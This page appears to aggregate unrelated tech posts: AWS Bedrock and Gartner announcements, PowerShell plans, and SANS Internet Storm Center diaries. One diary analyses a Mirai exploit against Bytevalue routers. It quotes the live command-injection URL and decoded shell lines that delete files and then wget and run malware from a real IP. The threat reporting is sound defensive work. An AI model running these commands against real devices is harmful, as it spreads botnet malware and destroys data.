Knowledge Bases for Amazon Bedrock now supports Amazon Aurora PostgreSQL and Cohere embedding models

This post was originally published on this site

During AWS re:Invent 2023, we announced the general availability of Knowledge Bases for Amazon Bedrock. With a knowledge base, you can securely connect foundation models (FMs) in Amazon Bedrock to your company data for Retrieval Augmented Generation (RAG).

In my previous post, I described how Knowledge Bases for Amazon Bedrock manages the end-to-end RAG workflow for you. You specify the location of your data, select an embedding model to convert the data into vector embeddings, and have Amazon Bedrock create a vector store in your AWS account to store the vector data, as shown in the following figure. You can also customize the RAG workflow, for example, by specifying your own custom vector store.

Knowledge Bases for Amazon Bedrock

Since my previous post in November, there have been a number of updates to Knowledge Bases, including the availability of Amazon Aurora PostgreSQL-Compatible Edition as an additional custom vector store option next to vector engine for Amazon OpenSearch Serverless, Pinecone, and Redis Enterprise Cloud. But that’s not all. Let me give you a quick tour of what’s new.

Additional choice for embedding model
The embedding model converts your data, such as documents, into vector embeddings. Vector embeddings are numeric representations of text data within your documents. Each embedding aims to capture the semantic or contextual meaning of the data.

Cohere Embed v3 – In addition to Amazon Titan Text Embeddings, you can now also choose from two additional embedding models, Cohere Embed English and Cohere Embed Multilingual, each supporting 1,024 dimensions.

Knowledge Bases for Amazon Bedrock

Check out the Cohere Blog to learn more about Cohere Embed v3 models.

Additional choice for vector stores
Each vector embedding is put into a vector store, often with additional metadata such as a reference to the original content the embedding was created from. The vector store indexes the stored vector embeddings, which enables quick retrieval of relevant data.

Knowledge Bases gives you a fully managed RAG experience that includes creating a vector store in your account to store the vector data. You can also select a custom vector store from the list of supported options and provide the vector database index name as well as index field and metadata field mappings.

We have made three recent updates to vector stores that I want to highlight: The addition of Amazon Aurora PostgreSQL-Compatible and Pinecone serverless to the list of supported custom vector stores, as well as an update to the existing Amazon OpenSearch Serverless integration that helps to reduce cost for development and testing workloads.

Amazon Aurora PostgreSQL – In addition to vector engine for Amazon OpenSearch Serverless, Pinecone, and Redis Enterprise Cloud, you can now also choose Amazon Aurora PostgreSQL as your vector database for Knowledge Bases.

Knowledge Bases for Amazon Bedrock

Aurora is a relational database service that is fully compatible with MySQL and PostgreSQL. This allows existing applications and tools to run without the need for modification. Aurora PostgreSQL supports the open source pgvector extension, which allows it to store, index, and query vector embeddings.

Many of Aurora’s features for general database workloads also apply to vector embedding workloads:

  • Aurora offers up to 3x the database throughput when compared to open source PostgreSQL, extending to vector operations in Amazon Bedrock.
  • Aurora Serverless v2 provides elastic scaling of storage and compute capacity based on real-time query load from Amazon Bedrock, ensuring optimal provisioning.
  • Aurora global database provides low-latency global reads and disaster recovery across multiple AWS Regions.
  • Blue/green deployments replicate the production database in a synchronized staging environment, allowing modifications without affecting the production environment.
  • Aurora Optimized Reads on Amazon EC2 R6gd and R6id instances use local storage to enhance read performance and throughput for complex queries and index rebuild operations. With vector workloads that don’t fit into memory, Aurora Optimized Reads can offer up to 9x better query performance over Aurora instances of the same size.
  • Aurora seamlessly integrates with AWS services such as Secrets Manager, IAM, and RDS Data API, enabling secure connections from Amazon Bedrock to the database and supporting vector operations using SQL.

For a detailed walkthrough of how to configure Aurora for Knowledge Bases, check out this post on the AWS Database Blog and the User Guide for Aurora.

Pinecone serverless – Pinecone recently introduced Pinecone serverless. If you choose Pinecone as a custom vector store in Knowledge Bases, you can provide either Pinecone or Pinecone serverless configuration details. Both options are supported.

Reduce cost for development and testing workloads in Amazon OpenSearch Serverless
When you choose the option to quickly create a new vector store, Amazon Bedrock creates a vector index in Amazon OpenSearch Serverless in your account, removing the need to manage anything yourself.

Since becoming generally available in November, vector engine for Amazon OpenSearch Serverless gives you the choice to disable redundant replicas for development and testing workloads, reducing cost. You can start with just two OpenSearch Compute Units (OCUs), one for indexing and one for search, cutting the costs in half compared to using redundant replicas. Additionally, fractional OCU billing further lowers costs, starting with 0.5 OCUs and scaling up as needed. For development and testing workloads, a minimum of 1 OCU (split between indexing and search) is now sufficient, reducing cost by up to 75 percent compared to the 4 OCUs required for production workloads.

Usability improvement – Redundant replicas disabled is now the default selection when you choose the quick-create workflow in Knowledge Bases for Amazon Bedrock. Optionally, you can create a collection with redundant replicas by selecting Update to production workload.

Knowledge Bases for Amazon Bedrock

For more details on vector engine for Amazon OpenSearch Serverless, check out Channy’s post.

Additional choice for FM
At runtime, the RAG workflow starts with a user query. Using the embedding model, you create a vector embedding representation of the user’s input prompt. This embedding is then used to query the database for similar vector embeddings to retrieve the most relevant text as the query result. The query result is then added to the original prompt, and the augmented prompt is passed to the FM. The model uses the additional context in the prompt to generate the completion, as shown in the following figure.

Knowledge Bases for Amazon Bedrock

Anthropic Claude 2.1 – In addition to Anthropic Claude Instant 1.2 and Claude 2, you can now choose Claude 2.1 for Knowledge Bases. Compared to previous Claude models, Claude 2.1 doubles the supported context window size to 200 K tokens.

Knowledge Bases for Amazon Bedrock

Check out the Anthropic Blog to learn more about Claude 2.1.

Now available
Knowledge Bases for Amazon Bedrock, including the additional choice in embedding models, vector stores, and FMs, is available in the AWS Regions US East (N. Virginia) and US West (Oregon).

Learn more

Read more about Knowledge Bases for Amazon Bedrock

— Antje

Exploit against Unnamed "Bytevalue" router vulnerability included in Mirai Bot, (Mon, Feb 12th)

This post was originally published on this site

Today, I noticed the following URL showing up in our "First Seen" list:

/goform/webRead/open/?path=|rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Fbruh.sh%3B%20chmod%20777%20bruh.sh%3B%20.%2Fbruh.sh

Initially, our sensors detected requests for just "goform/webRead/open". 

 

screen shot of bytevalue login page
Bytevalue Login page from bytevalue.com

URLs containing "goform" are typically associated with the RealTek SDK. Routers built around the RealTek SoC (System on a Chip) usually use the SDK to implement web-based access tools. The RealTek SDK had numerous vulnerabilities in the past. We currently track over 900 unique URLs in our honeypots using a "/goform/" URL. The most popular URL is usually "goform/set_LimitClient_cfg", associated with CVE-2023-26801 in LB-Link routers. But simple password brute force attacks are also common, taking advantage of default passwords.

 

So far, I have not been able to identify a specific CVE number for vulnerabilities related to  "goform/webRead/open". However, a Chinese blog post from November [1] suggests that this is related to a vulnerability in routers made by the Chinese company "BYTEVALUE." I could not find a patch for the vulnerability.

The exploit attempt In the URL above follows the standard command injection pattern. URL decode leads to:

rm -rf *; cd /tmp; wget http://192.3.152.183/bruh.sh; chmod 777 bruh.sh; ./bruh.sh

With "bruh.sh" being the typical shell script downloading the next stage for various architectures:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol http://192.3.152.183/mips; chmod +x lol; ./lol 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao http://192.3.152.183/mpsl; chmod +x lmao; ./lmao 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw http://192.3.152.183/i686; chmod +x kekw; ./kekw 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what http://192.3.152.183/powerpc; chmod +x what; ./what 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys http://192.3.152.183/sh4; chmod +x kys; ./kys 0day_router
[I removed various versions that used offensive filenames]

The binary is simply UPX-packed. The binary contains strings pointing to other router exploits and paths in "/home/landley/", which may indicate the system the binary was compiled on.

Virustotal did not have a sample yet when I uploaded mine [2]. However, the sample is well recognized as a "Mirai" variant that appears correct.

[1] https://blog.csdn.net/zkaqlaoniao/article/details/134328873
[2] https://www.virustotal.com/gui/file/0d0f841ff15c3a01e5376ec7453c2465ec87a9450a21053c3ab4fcb9bbbe1605?nocache=1


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Internet Storm Center Podcast ("Stormcast") 15th Birthday, (Fri, Feb 9th)

This post was originally published on this site

Happy Birthday to our daily Podcast. 3,685 episodes, about 410 hours or 17 days of content. I hope you are enjoying it. Please do me a favor and participate in our quick two-question survey to help me improve the podcast. It will remain brief and no-frills. But is there any content I should emphasize? Are there any stories I missed or should not have included? Let me know.

Anybody knows that this URL is about? Maybe Balena API request?, (Wed, Feb 7th)

This post was originally published on this site

Yesterday, I noticed a new URL in our honeypots: /v5/device/heartbeat. But I have no idea what this URL may be associated with. Based on some googleing, I came across Balena, a platform to manage IoT devices [1]. Does anybody have any experience with this software and know what an attacker would attempt to gain from the URL above? Maybe just fingerprinting devices? I do not see recent vulnerabilities anywhere, but there is a good chance that vulnerable components are being used by the software.

All requests originate from a single IP address, 24.114.52.95. This IP address shows no other activity in our honeypot and appears to be a Canadian consumer IP address. 

Looking back in our data, there are a couple of other URLs that may be related, for example, /v5/search, /v5/.env, and variables of /v5/search/???????/place/[integer number] . 

Balena (or Open Balena) offers an API to manage fleets of IoT devices. A system like this, managing many IoT devices, would certainly be an attractive target. Balena also distributes an "Etcher" tool that is often recommended to create bootable USB sticks from ISO files to install operating systems on devices. But the Etcher tool is a desktop application without network access, and unrelated to the IoT management API.

[1] https://docs.balena.io/reference/api/overview/


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Computer viruses are celebrating their 40th birthday (well, 54th, really), (Tue, Feb 6th)

This post was originally published on this site

Although "cyber security" is a relatively new field, it already has quite an interesting history, and it is worthwhile to look back at it from time to time. One historical event, that took place in February of the Orwellian year 1984, and which – therefore – celebrates its 40th anniversary this month, was publishing of Federic Cohen’s paper entitled "Computer viruses: Theory and experiments"[1], which is often cited as the origin of the term "computer virus".

AWS Weekly Roundup — Amazon Q in AWS Glue, Amazon PartyRock Hackathon, CDK Migrate, and more — February 5, 2024

This post was originally published on this site

With all the generative AI announcements at AWS re:invent 2023, I’ve committed to dive deep into this technology and learn as much as I can. If you are too, I’m happy that among other resources available, the AWS community also has a space that I can access for generative AI tools and guides.

Last week’s launches
Here are some launches that got my attention during the previous week.

Amazon Q data integration in AWS Glue (Preview) – Now you can use natural language to ask Amazon Q to author jobs, troubleshoot issues, and answer questions about AWS Glue and data integration. Amazon Q was launched in preview at AWS re:invent 2023, and is a generative AI–powered assistant to help you solve problems, generate content, and take action.

General availability of CDK Migrate – CDK Migrate is a component of the AWS Cloud Development Kit (CDK) that enables you to migrate AWS CloudFormation templates, previously deployed CloudFormation stacks, or resources created outside of Infrastructure as Code (IaC) into a CDK application. This feature was launched alongside the CloudFormation IaC Generator to give you an end-to-end experience that enables you to create an IaC configuration based off a resource, as well as its relationships. You can expect the IaC generator to have a huge impact for a common use case we’ve seen.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS news
Here are some additional projects, programs, and news items that you might find interesting:

Amazon API Gateway processed over 100 trillion API requests in 2023, demonstrating the growing demand for API-driven applications. API Gateway is a fully-managed API management service. Customers from all industry verticals told us they’re adopting API Gateway for multiple reasons. First, its ability to scale to meet the demands of even the most high-traffic applications. Second, its fully-managed, serverless architecture, which eliminates the need to manage any infrastructure, and frees customers to focus on their core business needs.

Join the PartyRock Generative AI Hackathon by AWS. This is a challenge for you to get hands-on building generative AI-powered apps. You’ll use Amazon PartyRock, an Amazon Bedrock Playground, as a fast and fun way to learn about Prompt Engineering and Foundational Models (FMs) to build a functional app with generative AI.

AWS open source news and updates – My colleague Ricardo writes this weekly open source newsletter in which he highlights new open source projects, tools, and demos from the AWS Community.

Upcoming AWS events
Whether you’re in the Americas, Asia Pacific & Japan, or EMEA region, there’s an upcoming AWS Innovate Online event that fits your timezone. Innovate Online events are free, online, and designed to inspire and educate you about AWS.

AWS Summits are a series of free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. These events are designed to educate you about AWS products and services and help you develop the skills needed to build, deploy, and operate your infrastructure and applications. Find an AWS Summit near you and register or set a notification to know when registration opens for a Summit that interests you.

AWS Community re:Invent re:Caps – Join a Community re:Cap event organized by volunteers from AWS User Groups and AWS Cloud Clubs around the world to learn about the latest announcements from AWS re:Invent.

You can browse all upcoming in-person and virtual events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Veliswa

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!

PowerShell and OpenSSH team investments for 2024

This post was originally published on this site

PowerShell 7.5

We continue to follow our yearly release schedule for PowerShell 7 and the next version will align with .NET 9.

Pseudo-terminal support

PowerShell currently has a design limitation that prevents full capture of output from native commands by PowerShell itself.
Native commands (meaning executables you run directly) will write output to STDERR or STDOUT pipes.
However, if the output is not redirected, PowerShell will simply have the native command write directly to the console.
PowerShell can’t just always redirect the output to capture it because:

  • The order of output from STDERR and STDOUT can be non-deterministic because they are on different pipes,
    but the order written to the console has meaning to the user.
  • Native commands can use detection of redirection to determine if the command is being run interactive or non-interactively
    and behave differently such as prompting for input or defaulting to adding text decoration to the output.

To address this, we are working on an experimental feature to leverage pseudoterminals
to enable PowerShell to capture the output of native commands while still allowing the native command to seemingly write directly to the console.

This feature can then further be leveraged to:

  • Ensure complete transcription of native commands
  • Proper rendering of PowerShell progress bars in scripts that call native commands
  • Enable feedback providers to act upon native command output
    • For example, it would be possible to write a feedback provider that looked at the output of git commands
      and provided suggestions for what to do next based on the output.

Once this feature is part of PowerShell 7, there are other interesting scenarios that can be enabled in the future.

Platform support

Operating system versions and distributions are constantly evolving.
We want to ensure that a supported platform is a platform that is tested and validated by the team.

During 2024, the engineering team will focus on:

  • Making our tests reliable so we are only spending manual effort investigating real issues when test fails
  • Simplify how we add new platforms to our test matrix so new distro requests can be fulfilled more quickly
  • More actively track the lifecycle of platforms we support
  • Automate publishing the supported platforms list so that our docs are always up to date

Bug fixes and community PRs

The community has been great at opening issues and pull requests to help improve PowerShell.
For this release, we will focus on addressing issues and PRs that have been opened by the community.
This means less new features from the team, but we hope to make up for that with the community contributions
getting merged into the product. We will also be investing in the Working Group application process to expand the reach of those groups.

Please use reactions in GitHub issues and PRs to help us prioritize what to focus our limited time on.

Artifact management

Fundamentals work

Ensure PowerShell Gallery addresses the latest compliance requirements for security, accessibility, and reliability.

Include new types of repositories for PSResourceGet

We plan to introduce integration with container registries, both public and private, which will
help enterprise customers create a differentiation between trusted and untrusted content.
This change will allow for a Microsoft trusted repository while the PowerShellGallery continues as untrusted by default.
By having more options for private galleries, in addition to a Mirosoft trusted repository and the PowerShell Gallery,
this enables customers to have control over package availability suitable for their environments.

Concurrent installs

To improve performance during long-running installations, we plan to enable parallel operations
so multiple module installations can happen at the same time.
This change will be particularly impactful in modules with many dependencies, such as the Az module,
which currently can take significant time to install.

Local caching of artifact details

Currently the find-psresource cmdlet pulls information about available artifacts from service endpoints
and outputs the list locally. We believe there is opportunity to locally cache the metadata about available
artifacts to reduce network dependency and improve performance when resolving dependency relationships.
This would also help enable implementing a feedback provider to suggest how to install module that is not currently installed.
So if a user tries to run a cmdlet that is not installed, the feedback provider will suggest what module to install to get the cmdlet to work.

Intelligence in the shell

We are obvserving and being thoughtful about what it will mean to integrate the experiences
provided by large language models into shell experience.
Our current outlook is to think beyond natural language chat to deep integration of learning opportunities.

We also believe there are lots of improvements to the interactivity of PowerShell that does not require a large language model.
This includes some more subtle improvements to the interactive experience of PowerShell that would help increase productivity
and efficiency at the command line.

Configuration

Desired State Configuration (DSC) helped to enable configuration as code for Windows.
With v3, we are focusing on enabling cross-platform use, simplifying resource development, improving experience
to integrate with higher level configuration management tools, and improving the experience for end users.
Our goal is to be code complete by end of March and work towards a release candidate by middle of the year.
This is a complete rewrite of DSC and we welcome feedback during the design and development process.

Remoting

Win32_OpenSSH

We hope to continue bringing new versions of OpenSSH to the Windows Server platform. Another goal
is to reduce the complex steps required to install and manage SSH at scale, to enable
partners that create automation tools to use the same mechanism when connecting to Windows servers
as they use for Linux.

SSHDConfig

Monitoring and management of the sshd_config file at scale across platforms can be challenging.
We are working on a DSC v3 resource to enable management of sshd_config using a syntax that is
closer aligned to the command line tools used by modern cloud platforms.
Initially, we’ll be targeting auditing scenarios but we hope to enable full management of the file in the future.

Help system

platyPS is a module that enables you to write PowerShell help
documentation in Markdown and convert it to PowerShell help format.
This tool is used by Microsoft teams and the community of module authors to more easily write and maintain help documentation.
We hope to continue work in this area to address partner feedback.

Other projects

The projects above will already keep the team very busy, but we will continue to maintain other existing projects.
We appreciate the community contributions to these projects and will continue to review issues and PRs:

  • VSCode extension
  • PSScriptAnalyzer module
  • ConsoleGuiTools module
  • TextUtility module
  • PSReadLine module
  • SecretManagement module

Our other projects will continue to be serviced on an as needed basis.

Thanks to the community from Steve Lee and Michael Greene on behalf of our team!

The post PowerShell and OpenSSH team investments for 2024 appeared first on PowerShell Team.

AWS named as a Leader in 2023 Gartner Magic Quadrant for Strategic Cloud Platform Services for thirteenth year in a row

This post was originally published on this site

On December 4, 2023, AWS was named as a Leader in the 2023 Magic Quadrant for Strategic Cloud Platform Services (SCPS). AWS is the longest-running Magic Quadrant Leader, with Gartner naming AWS a Leader for the thirteenth consecutive year. AWS is placed highest on the Ability to Execute axis.

SCPS, previously known as Magic Quadrant for Cloud Infrastructure and Platform Services (CIPS), is defined as “standardized, automated, public cloud offerings integrating infrastructure services (for example, computing, network, and storage), platform services (for example, managed application and data services) and transformation services (programs/resources that help customers adopt cloud-oriented IT delivery models).”

I have the chance to talk with our customers every single week. When I ask the main reasons why they choose AWS, I consistently hear the following responses:

A large set of capabilities. AWS offers more cloud services and features than other providers, including compute, storage, databases, machine learning (ML), data analytics, and Internet of Things (IoT). This allows faster, easier, and cheaper cloud migration of existing apps and building new apps. AWS has the deepest functionality within services, such as a wide variety of purpose-built databases optimized for cost and performance.

A rapid pace of innovation. AWS enables faster experimentation and innovation through the latest technologies. We continually accelerate innovation pace to invent new technologies for business transformation. For example, in 2014, we launched the serverless computing service AWS Lambda, eliminating server provisioning and management for developers. In 2017, we launched the AWS Nitro System, a combination of dedicated hardware and a lightweight hypervisor that enables better performance, increased security, and cost savings for Amazon EC2 instances. At re:Invent 2018, we announced AWS Graviton, a family of processors designed to deliver the best price performance for your cloud workloads running in Amazon Elastic Compute Cloud (Amazon EC2). And today, we continue to innovate with generative artificial intelligence (AI) services such as Amazon Q or Amazon CodeWhisperer, your coding productivity tool available in developer’s integrated development environment (IDE) and on the command line (CLI).

A large community of customers and partners. AWS has a large, active community with millions of customers and tens of thousands of partners globally. Customers in most industries and of varied sizes use AWS for diverse applications. The AWS Partner Network includes thousands of systems integrators specializing in AWS and tens of thousands of independent software vendors (ISV) adapting their technologies for AWS.

You also benefit from the global AWS infrastructure, including the 33 Regions where you can deploy your workload and store your data. We pre-announced four future Regions in Malaysia, New Zealand, Thailand, and the AWS European Sovereign Cloud.

An AWS Region is a physical location in the world where we have multiple Availability Zones. Availability Zones consist of one or more discrete data centers, each with redundant power, networking, and connectivity, housed in separate facilities. Unlike with other cloud providers, who often define a region as a single data center, having multiple Availability Zones allows you to operate production applications and databases that are more highly available, fault-tolerant, and scalable than would be possible from a single data center.

AWS has more than 17 years of experience building its global infrastructure. And, as Werner Vogels, Amazon CTO, keeps repeating, “There’s no compression algorithm for experience,” especially when it comes to scale, security, and performance.

Here is the graphical representation of the 2023 Magic Quadrant for Strategic Cloud Platform Services.

Gartner | 2023 Magic Quadrant for Strategic Cloud Platform ServicesThe full Gartner report has details about the features and factors they reviewed. It explains the methodology used and the recognitions. This report can serve as a guide when choosing a cloud provider that helps you innovate on behalf of your customers.

— seb

Gartner, 2023 Magic Quadrant for Strategic Cloud Platform Services, 4 December 2023, David Wright, Dennis Smith, et. al.

Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

GARTNER is a registered trademark and service mark of Gartner and Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from AWS.

 

Public Information and Email Spam, (Mon, Feb 5th)

This post was originally published on this site

Many organizations publicly list contact information to help consumers reach out for help when needed. This may be general contact information or a full public directory of staff. It seems obvious that having any kind of publicly available information will increase the liklihood that these accounts will receive spam or phishing emails. To help understand a bit of this, I set up a brand new domain with a very basic website and collected email using Amazon SES [1] for a couple of weeks. The website contained email addresses in a variety of formats: